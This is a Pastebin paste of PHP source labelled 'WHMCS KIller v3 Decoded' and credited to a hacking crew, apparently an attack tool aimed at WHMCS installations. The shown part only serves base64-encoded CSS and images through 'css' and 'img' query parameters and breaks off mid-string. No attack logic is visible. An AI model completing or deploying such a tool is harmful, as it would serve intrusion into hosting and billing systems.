daily pastebin goal
59%
SHARE
TWEET

WHMCS V3

5P4D3 Jan 20th, 2017 832 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. //WHMCS KIller v3 Decoded By N!nj@ X
  3. //Fb.com/n9nj2.X or fb.com/n9nj2.Xa
  4. //Death Adders Crew
  5. $currentFile = $_SERVER["SCRIPT_NAME"];
  6.   $parts = Explode('/', $currentFile);
  7.   $currentFile = $parts[count($parts) -1];
  8.    if ($_GET['css']==1){   header("Content-type: text/css", true);
  9.   echo (str_replace('%file%', $currentFile,base64_decode('LyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCg0KCVJFU0VULkNTUw0KCXZlcnNpb246IDEuMA0KCXVwZGF0ZWQ6IDIwMDktMDItMDIsIDExOjQ3IEdNVCsxDQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICovDQoNCi8qID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpSRVNFVA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KKiB7bWFyZ2luOjA7IHBhZGRpbmc6MDt9DQpodG1sLCBib2R5LCBkaXYsIHNwYW4sIGFwcGxldCwgb2JqZWN0LCBpZnJhbWUsIGgxLCBoMiwgaDMsIGg0LCBoNSwgaDYsIHAsIGJsb2NrcXVvdGUsIHByZSwgYSwgYWJiciwgYWNyb255bSwgYWRkcmVzcywgY2l0ZSwgY29kZSwgZGVsLCBkZm4sIGVtLCBpbWcsIGlucywga2JkLCBxLCBzYW1wLCBzdHJvbmcsIHN1Yiwgc3VwLCB0dCwgdmFyLCBkbCwgZHQsIGRkLCBvbCwgdWwsIGxpLCBmaWVsZHNldCwgZm9ybSwgbGFiZWwsIGxlZ2VuZCwgdGFibGUsIGNhcHRpb24sIHRib2R5LCB0Zm9vdCwgdGhlYWQsIHRyLCB0aCwgdGQge2JvcmRlcjowOyBvdXRsaW5lOjA7IHZlcnRpY2FsLWFsaWduOmJhc2VsaW5lOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O30NCi5oaWRkZW4ge3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwZW07IHRvcDotMTAwMGVtOyB3aWR0aDoxcHg7IGhlaWdodDoxcHg7IG92ZXJmbG93OmhpZGRlbjt9DQoubm9zY3JlZW4ge2Rpc3BsYXk6bm9uZTt9DQouYm94IHttaW4taGVpZ2h0OjFweDt9DQouYm94OmFmdGVyIHtkaXNwbGF5OmJsb2NrOyB2aXNpYmlsaXR5OmhpZGRlbjsgY2xlYXI6Ym90aDsgbGluZS1oZWlnaHQ6MDsgZm9udC1zaXplOjA7IGNvbnRlbnQ6Ii4iO30NCi5maXgge2Zsb2F0Om5vbmU7IGNsZWFyOmJvdGg7IHdpZHRoOjA7IGhlaWdodDowOyBtYXJnaW46MDsgcGFkZGluZzowOyBib3JkZXI6MDsgbGluZS1oZWlnaHQ6MDsgZm9udC1zaXplOjA7fQ0KLmYtbGVmdCB7ZmxvYXQ6bGVmdCAhaW1wb3J0YW50O30NCi5mLXJpZ2h0IHtmbG9hdDpyaWdodCAhaW1wb3J0YW50O30NCi50LWxlZnQge3RleHQtYWxpZ246bGVmdCAhaW1wb3J0YW50O30NCi50LWNlbnRlciB7dGV4dC1hbGlnbjpjZW50ZXIgIWltcG9ydGFudDt9DQoudC1yaWdodCB7dGV4dC1hbGlnbjpyaWdodCAhaW1wb3J0YW50O30NCi50LWp1c3RpZnkge3RleHQtYWxpZ246anVzdGlmeSAhaW1wb3J0YW50O30NCi52YS10b3Age3ZlcnRpY2FsLWFsaWduOnRvcCAhaW1wb3J0YW50O30NCi52YS1taWRkbGUge3ZlcnRpY2FsLWFsaWduOm1pZGRsZSAhaW1wb3J0YW50O30NCi52YS1ib3R0b20ge3ZlcnRpY2FsLWFsaWduOmJvdHRvbSAhaW1wb3J0YW50O30NCi5ub20ge21hcmdpbjowICFpbXBvcnRhbnQ7fQ0KLm5vbXQge21hcmdpbi10b3A6MCAhaW1wb3J0YW50O30NCi5ub21iIHttYXJnaW4tYm90dG9tOjAgIWltcG9ydGFudDt9')));
  10.   exit;
  11.   }    if ($_GET['css']==2){   header("Content-type: text/css", true);
  12.   echo (str_replace('%file%', $currentFile,base64_decode('LyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCg0KCVNUWUxFLkNTUw0KCXZlcnNpb246IDEuNg0KCXVwZGF0ZWQ6IDIwMDktMDMtMDYsIDEzOjAwIEdNVCsxDQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICovDQoNCi8qID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpIVE1MIC0gc3R5bGVzDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAqLw0KDQpib2R5IHtiYWNrZ3JvdW5kLWNvbG9yOiNlYWVhZWE7IGNvbG9yOiMzMDMwMzA7fQ0KYSB7Y29sb3I6IzAwODVjYzt9DQphOmhvdmVyLCBhOmFjdGl2ZSwgYTpmb2N1cyB7Y29sb3I6I2RmMDAwMDt9DQojY29udGVudCBoMiB7Y29sb3I6IzAwODVjYzt9DQojY29udGVudCB0YWJsZSB7Ym9yZGVyOjJweCBzb2xpZCAjY2ZjZmNmO30NCiNjb250ZW50IHRhYmxlIHRoIHtib3JkZXItcmlnaHQ6MXB4IHNvbGlkICMwMDc0QjM7IGJhY2tncm91bmQtY29sb3I6IzAwODVjYzsgY29sb3I6I2ZmZjt9DQojY29udGVudCB0YWJsZSB0ZCB7Ym9yZGVyOjFweCBzb2xpZCAjY2ZjZmNmO30NCiNjb250ZW50IHRhYmxlIHRyLmJnIHRkIHtiYWNrZ3JvdW5kLWNvbG9yOiNlOGY2ZmY7fQ0KI2NvbnRlbnQgdGFibGUgdGQuYmcyICB7YmFja2dyb3VuZC1jb2xvcjojZThmNmZmO30NCiNjb250ZW50IGRsIGR0IHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IGZpZWxkc2V0IHtib3JkZXI6MXB4IHNvbGlkICNjY2M7fQ0KI2NvbnRlbnQgbGVnZW5kIHtiYWNrZ3JvdW5kOiNGRkY7IGNvbG9yOiMwMDg1Y2M7fQ0KI2NvbnRlbnQgYWNyb255bSwgI2NvbnRlbnQgYWJiciwgI2NvbnRlbnQgLmhlbHAge2JvcmRlci1ib3R0b206MXB4IGRvdHRlZCAjY2ZjZmNmO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkhUTUwgLSB3aXRob3V0IHN0eWxlcw0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KdGFibGUubm9zdHlsZSB0aCwgZGwubm9zdHlsZSBkdCB7Y29sb3I6IzMwMzAzMCAhaW1wb3J0YW50O30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkxBWU9VVA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KI3RyYXkge2JhY2tncm91bmQtY29sb3I6IzMwMzAzMDsgY29sb3I6I2NmY2ZjZjt9DQojdHJheSBhLCAjdHJheSBzdHJvbmcge2NvbG9yOiNmZmY7fQ0KI3RyYXkgYTpob3ZlciwgI3RyYXkgYTphY3RpdmUsICN0cmF5IGE6Zm9jdXMge2NvbG9yOiNiNGUzZmY7fQ0KI21lbnUge2JhY2tncm91bmQtY29sb3I6IzAwODVjYzt9DQojbWVudSB1bCBsaSBhIHtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7IGNvbG9yOiMzMDMwMzA7fQ0KI21lbnUgdWwgbGkgYSBzcGFuIHtiYWNrZ3JvdW5kLWNvbG9yOiNGRkY7fQ0KI21lbnUgdWwgbGkgYTpob3ZlciwgI21lbnUgdWwgbGkgYTphY3RpdmUsICNtZW51IHVsIGxpIGE6Zm9jdXMsICNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEge2JhY2tncm91bmQtY29sb3I6I0ZGRjsgY29sb3I6I2RmMDAwMDt9DQojbWVudSB1bCBsaSBhOmhvdmVyIHNwYW4sICNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEgc3BhbiB7YmFja2dyb3VuZC1jb2xvcjojRkZGO30NCiNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEge2NvbG9yOiMwMDg1Y2M7fQ0KI21lbnUgdWwuZi1yaWdodCBhIHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IHtib3JkZXI6MXB4IHNvbGlkICNhZmFmYWY7IGJhY2tncm91bmQ6I2ZmZjt9DQoNCiNmb290ZXIge2NvbG9yOiM3MDcwNzA7fQ0KI2Zvb3RlciBhIHtjb2xvcjojNzA3MDcwO30NCiNmb290ZXIgYTpob3ZlciwgI2Zvb3RlciBhOmFjdGl2ZSwgI2Zvb3RlciBhOmZvY3VzIHtjb2xvcjojMzAzMDMwO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCk9USEVSUw0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KI2FzaWRlICNsb2dvIGltZyB7Ym9yZGVyOjFweCBzb2xpZCAjYmZiZmJmO30NCiNhc2lkZSAjc2VhcmNoIGZpZWxkc2V0IGEge2NvbG9yOiMzMDMwMzA7fQ0KI2FzaWRlICNzZWFyY2ggZmllbGRzZXQge2JvcmRlcjoxcHggc29saWQgI2JmYmZiZjt9DQojYXNpZGUgI3NlYXJjaCBmaWVsZHNldCBhOmhvdmVyLCAjYXNpZGUgI3NlYXJjaCBmaWVsZHNldCBhOmFjdGl2ZSwgI2FzaWRlICNzZWFyY2ggZmllbGRzZXQgYTpmb2N1cyB7Y29sb3I6I2RmMDAwMDt9DQojYXNpZGUgI2J0bi1jcmVhdGUgYSB7YmFja2dyb3VuZC1jb2xvcjojZmZmOyBjb2xvcjojMzAzMDMwO30NCiNhc2lkZSAjYnRuLWNyZWF0ZSBhIHNwYW4ge2JhY2tncm91bmQtY29sb3I6I2ZmZjt9DQojYXNpZGUgdWwgbGkgYSB7Ym9yZGVyLWJvdHRvbToxcHggc29saWQgI2NmY2ZjZjsgY29sb3I6IzMwMzAzMDt9DQojYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgYSB7YmFja2dyb3VuZC1jb2xvcjojZGYwMDAwOyBjb2xvcjojZmZmO30NCiNhc2lkZSB1bCBsaSBhOmhvdmVyLCAjYXNpZGUgdWwgbGkgYTphY3RpdmUsICNhc2lkZSB1bCBsaSBhOmZvY3VzIHtjb2xvcjojZGYwMDAwO30NCiNhc2lkZSB1bCB1bCBsaSBhLCAjYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgdWwgbGkgYSB7Ym9yZGVyLWJvdHRvbToxcHggc29saWQgI2NmY2ZjZjsgYmFja2dyb3VuZC1jb2xvcjojZjVmNWY1OyBjb2xvcjojMzAzMDMwO30NCiNhc2lkZSB1bCBsaSB1bCBsaSBhIHtiYWNrZ3JvdW5kLWNvbG9yOiNlM2UzZTM7fQ0KI2FzaWRlIHVsIHVsIGxpIGE6aG92ZXIsICNhc2lkZSB1bCB1bCBsaSBhOmFjdGl2ZSwgI2FzaWRlIHVsIHVsIGxpIGE6Zm9jdXMsICNhc2lkZSB1bCBsaSNzdWJtZW51LWFjdGl2ZSB1bCBsaSBhOmhvdmVyLCAjYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgdWwgbGkgYTphY3RpdmUsICNhc2lkZSB1bCBsaSNzdWJtZW51LWFjdGl2ZSB1bCBsaSBhOmZvY3VzIHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IGgxIHtiYWNrZ3JvdW5kLWNvbG9yOiMzMDMwMzA7IGNvbG9yOiNmZmY7fQ0KI2NvbnRlbnQgLnRhYnMge2JvcmRlci1ib3R0b206MXB4IHNvbGlkICNjZmNmY2Y7fQ0KI2NvbnRlbnQgLnRhYnMgYSB7Y29sb3I6IzMwMzAzMDt9DQojY29udGVudCAudGFicyBhIHNwYW4ge2NvbG9yOiMzMDMwMzA7fQ0KI2NvbnRlbnQgLnRhYnMgLnVpLXRhYnMtc2VsZWN0ZWQgYSB7Y29sb3I6I2ZmZjt9DQojY29udGVudCAudGFicyAudWktdGFicy1zZWxlY3RlZCBhIHNwYW4ge2NvbG9yOiNmZmY7fQ0KLmhpZ2gge2NvbG9yOiNkZjAwMDA7fQ0KLmhpZ2gtYmcge2JhY2tncm91bmQ6I0ZGQjt9DQoubG93IHtjb2xvcjojNzA3MDcwO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCk1FU1NBR0VTDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAqLw0KDQoubXNnLndhcm5pbmcge2JvcmRlcjoycHggc29saWQgI0YyREQ4QzsgYmFja2dyb3VuZC1jb2xvcjojRkZGNUNDO30NCi5tc2cud2FybmluZyBhIHtjb2xvcjojZGYwMDAwO30gLm1zZy53YXJuaW5nIGE6aG92ZXIsIC5tc2cud2FybmluZyBhOmFjdGl2ZSwgLm1zZy53YXJuaW5nIGE6Zm9jdXMge2NvbG9yOiMzMDMwMzA7fQ0KLm1zZy5pbmZvIHtib3JkZXI6MnB4IHNvbGlkICNCOEUyRkI7IGJhY2tncm91bmQtY29sb3I6I0U4RjZGRjt9DQoubXNnLmRvbmUge2JvcmRlcjoycHggc29saWQgI0JCREY4RDsgYmFja2dyb3VuZC1jb2xvcjojRUFGN0Q5O30NCi5tc2cuZXJyb3Ige2JvcmRlcjoycHggc29saWQgI0ZGQUVBRTsgYmFja2dyb3VuZC1jb2xvcjojRkVFQkVCO30NCg==')));
  13.   exit;
  14.   }  if ($_GET['css']==3){   header("Content-type: text/css", true);
  15.   echo (str_replace('%file%', $currentFile,base64_decode('I2NvbHMge21hcmdpbjoxNXB4OyBiYWNrZ3JvdW5kOm5vbmU7fQ0KI2FzaWRlLCAjdHJheSAuaWNvLWNvbDEge2Rpc3BsYXk6bm9uZTt9DQo=')));
  16.   exit;
  17.   }  if ($_GET['css']==4){   header("Content-type: text/css", true);
  18.   echo (str_replace('%file%', $currentFile,base64_decode('I2NvbHMge3Bvc2l0aW9uOnJlbGF0aXZlOyBtYXJnaW46MTVweCAwOyBwYWRkaW5nLXJpZ2h0OjE1cHg7IGJhY2tncm91bmQ6dXJsKCIlZmlsZSU/aW1nPTUiKSAyMzBweCAwIHJlcGVhdC15O30NCiNhc2lkZSB7ZmxvYXQ6bGVmdDsgd2lkdGg6MjE1cHg7IG1hcmdpbi1yaWdodDowO30NCiNjb250ZW50IHttYXJnaW4tbGVmdDoyMzJweDsgb3ZlcmZsb3c6dmlzaWJsZTt9DQojdHJheSAuaWNvLWNvbDIge2Rpc3BsYXk6bm9uZTt9DQoNCmh0bWw+Ym9keSAjYXNpZGUge21hcmdpbi1yaWdodDoyMHB4O30NCmh0bWw+Ym9keSAjY29udGVudCB7bWFyZ2luLWxlZnQ6MDsgb3ZlcmZsb3c6aGlkZGVuO30=')));
  19.   exit;
  20.   }    if ($_GET['css']==5){   header("Content-type: text/css", true);
  21.   echo (str_replace('%file%', $currentFile,base64_decode('')));
  22.   exit;
  23.   }   if ($_GET['img']=="0"){  header("Content-Type: image/gif");
  24.    echo (base64_decode(''));
  25.   exit;
  26.   }if ($_GET['img']==1){  header("Content-Type: image/gif");
  27.    echo (base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5Ojf/2wBDAQoKCg0MDRoPDxo3JR8lNzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzf/wAARCAAqACcDASIAAhEBAxEB/8QAGgAAAwEBAQEAAAAAAAAAAAAAAAUGBwQDAv/EADEQAAEEAQQBAAgEBwAAAAAAAAECAwQRBQAGEiETFRYjMTJBUWEiJjV1MzRCU2KztP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwDcdKNx55nCR2/ZqkzpBKIkRB/E8rr7GkixaqNWAASUpPvn8i5icRInMQZE51oDhHjoKlrUSAOgCaF2SASACaNVqRwE7Hxco3Ozbk6RnMi8mO247i5LDSLum2y4gBIA5GruuXvJUVB6+quZ/X/SP5m+L3Dw+P8Ascb+D/G6vu+XtNUW3M8zm47ns1Rp0chEuIs/iZV39haTRpVC6IIBCkhvqD3BMgSsgMngnMgzl4bq2DIbxEt1l3irittZQ2QtNpo0f6RRBCVJC80aX4DIuZbER5z8GRBddB5x5CClaFAkHogGjVgkAkEGhdaNAw1Kb6/nNqfvrX+l7Xczu/CvzEw235JkHifGYT4ICiQCbR0CQez10ddecwzGZYjodeeYdjPpkR32Cnm04kEWAoFJ6UoUoEd/WiAZaR7N/SJH7pkP+t7SXITGcdNEOXvPcKHyrilIxzCuZrlSSIpCurPX0OqjCRY8TFsoiKdW25yeLjwpbinFFalqFCipSiSKAF0AB0A7tGjRoI3PRMsvN7hexDbqJLmAaaiPAUkvBcg8Qr3chySftY18bUZYTuHng4k6LixA4y0ymnW+Ujmnh04ASsJ8nJQ+qbJ1a6NAg3BHfd3Bth1plxbbM15Tq0pJDYMZ1IKj8hZA7+ZGpdmNJ9KM3GnesYzJW9JLbniMPyk/HXDx+GkhN/F8r1o+jQZTt9tUtjFOYRuZ6bTMkmVLcbd8YZt0UpahxUm+FJBPY6HR0a0LbLaGsMyhpCUJC3KSkUP4itGg/9k='));
  28.   exit;
  29.   }    if ($_GET['img']==2){  header('Content-Type: image/gif');
  30.    echo (base64_decode('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'));
  31.   exit;
  32.   }    if ($_GET['img']==3){  header('Content-Type: image/gif');
  33.    echo (base64_decode('R0lGODlhrwAlANUAAP////7+/v39/erq6rKystfX1+Dg4Nvb2+fn5/f39/n5+fDw8OXl5e7u7vj4+OLi4uvr6/z8/PT09PPz8/Hx8fr6+vv7+/b29tjY2N7e3tTU1NLS0ubm5rS0tOnp6bm5udnZ2cTExNHR0e/v793d3cPDw+jo6L29vcnJycbGxt/f38XFxcDAwMLCwqurq9ra2ri4uM7Ozq6ursjIyKysrOPj4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACvACUAAAb/QIBwSCwaj8ikcslsOp/QaDMxYnA8g+xAyu16v+CwV8AxmLTitHrNbhdHB07WTa/b78YaCLHF+/+AXQExKh6Bh4iJRiQiHAGPkJGSk5SVlpeYmZqbnJ2enwELJQagpaanqKmqnwofB6uwsbKztI8dILW5uru8kAQFAsHCw8TFxsfIycrLzM3Oz9DRwb/S1dbX2Nna0r8R3t/g4eLj5OXm5+jp6uvs7e7evxby8/T19vf4+fr7/P3+/wADCpT3q4LBgwgTKlzIsKHDhxAjSpxIsaJFg78UaNzIsaPHjyBDihxJsqTJkyhTqtT4y4HLlzBjypxJs6bNmzhz6tzJs6dP/5e/EggdSrSo0aNIkypdyrSp06dQo0oV+uuC1atYs2rdyrWr169gw4odS7asWau/JKhdy7at27dw48qdS7eu3bt48+pV+2uC37+AAwseTLiw4cOIEytezLixY7+/KEieTLmy5cuYM2vezLmz58+gQ4uW/GuB6dOoU6tezbq169ewY8ueTbu2bdO/Gujezbu379/AgwsfTry48ePIkyvX/QuC8+fQo0ufTr269evYs2vfzr27d+e/tIgfT768+fPo06tfz769+/fwx/9CQL++/fv48+vfz7+///8ABijggATS9wsDCCao4IIMNujggxBGKOGEFFZo4YUYMvDALw906P/hhyCGKOKIJJZo4okopqjiiiy2+EABHWBgwIw01mjjjTjmqOOOPPbo449ABinkkAas4EoGSCap5JJMNunkk1BGKeWUVFZp5ZVYkkDAKAd06eWXYIYp5phklmnmmWimqeaabLbZAgGNYCDnnHTWaeedeOap55589unnn4AGGugMLoSQgQcaJKrooow26uijkEYq6aSUVmrppZhaugEMNLCwxwAbhCrqqKSWauqpqKaq6qqsturqq7CyisIJMnSQwgtyDEDArrz26uuvwAYr7LDEFmvsscgmq6yxHXwQwgZmaFHAtNRWa+212Gar7bbcduvtt+CGK663GBxgwBXiBQEAOw=='));
  34.   exit;
  35.   }    if ($_GET['img']==4){  header('Content-Type: image/gif');
  36.    echo (base64_decode('R0lGODlhAQA3AMQAADAwMDExMTU1NTIyMk5OTjQ0NDg4OD4+PjMzM0xMTDs7O0pKSlBQUElJSTw8PDc3NzY2NkBAQEVFRUhISDo6OkREREFBQUJCQj8/P0dHR0ZGRjk5OUNDQwAAAAAAAAAAACH5BAAAAAAALAAAAAABADcAAAUmIMMQZJIsSzNlmlRxlxVhx+EoCrUZxgMJwEIBgRgYA0gkYMlkhgAAOw=='));
  37.   exit;
  38.   }    if ($_GET['img']==5){  header('Content-Type: image/gif');
  39.    echo (base64_decode('R0lGODlhBQABAKIAAOjo6OPj49zc3NLS0sfHxwAAAAAAAAAAACH5BAAAAAAALAAAAAAFAAEAAAMECCFDCQA7'));
  40.   exit;
  41.   }    if ($_GET['img']==6){  header('Content-Type: image/gif');
  42.    echo (base64_decode('R0lGODlhAwABAIABAM/Pz////yH5BAEAAAEALAAAAAADAAEAAAICRFIAOw=='));
  43.   exit;
  44.   }    if ($_GET['img']==7){  header('Content-Type: image/gif');
  45.    echo (base64_decode('R0lGODlhEAAQAIABAN8AAP///yH5BAEAAAEALAAAAAAQABAAAAIhjI+py82Q4AL0UIlu1djy+3wON4rTV0VaQKoYOEXOTB8FADs='));
  46.   exit;
  47.   }    if ($_GET['img']==8){  header('Content-Type: image/gif');
  48.    echo (base64_decode('R0lGODlhEAAQAIABACewC////yH5BAEAAAEALAAAAAAQABAAAAIfjI+py+0I3gFU0utuTdHoDlWf8mlMCS7jg0lB6sZPAQA7'));
  49.   exit;
  50.   }    if ($_GET['img']==9){  header('Content-Type: image/gif');
  51.    echo (base64_decode('R0lGODlhEAAQAMQVAACFzP///wyLznvA5fP5/SGV0zCc1oHD5gOGzcDh8jmg1+r1+67Y7+32+w+Mz37B5Taf16vX7rre8bfd8QaIzf///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABUALAAAAAAQABAAAAVUYCWOZFkSh4IgykGYVVIAdF0kJVPvNTM2gl0gsBM0RAOeEjAQGYRDnkFE4UV3DpHDSiw6uVIk9EprVhbBJU2wGEXUtEhJMuMVJjDCA0KDPF4wgSQhADs='));
  52.   exit;
  53.   }    if ($_GET['img']==10){  header('Content-Type: image/gif');
  54.    echo (base64_decode('R0lGODlhEAAQAKIEAN8AAP///+UvL+QqKv///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM0SLokwhACEKuYo8pJtbpc5nGcBwYBpnFoGYFAq26TPEFwnIYM6bsNn232G95yP9IgyQQkAAA7'));
  55.   exit;
  56.   }    if ($_GET['img']==11){  header('Content-Type: image/gif');
  57.    echo (base64_decode('R0lGODlhBQBGAOYAAP////7+/vv7+/39/ebm5vT09Pz8/O/v7+3t7eHh4evr6/j4+Pn5+fHx8fLy8uPj4+np6ff39/b29t7e3tvb29jY2NbW1hWn9gWN1gaO19LS0gaK0gaM1BWn9QWJ0AWFygWGywSEyAR5uANtpgWM1YXQ+LvJ0UOw68fo+rHP38Ti8pXB2DaLuE+895KwwEGWxGelxrfi+Xq42dXX1/D4/ESx66nL3DqazkSk2NHZ3fH5/efv9M/X26nG1r7Hy/z+//z9/tTV1nC64ub0/E679QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAFAEYAAAfEgBcXLTFDHSUAiUQ/iQAojQA6kJMBlZaXmAOam5wGnp4CoaKjDKWlC6ioEaurEq6uBb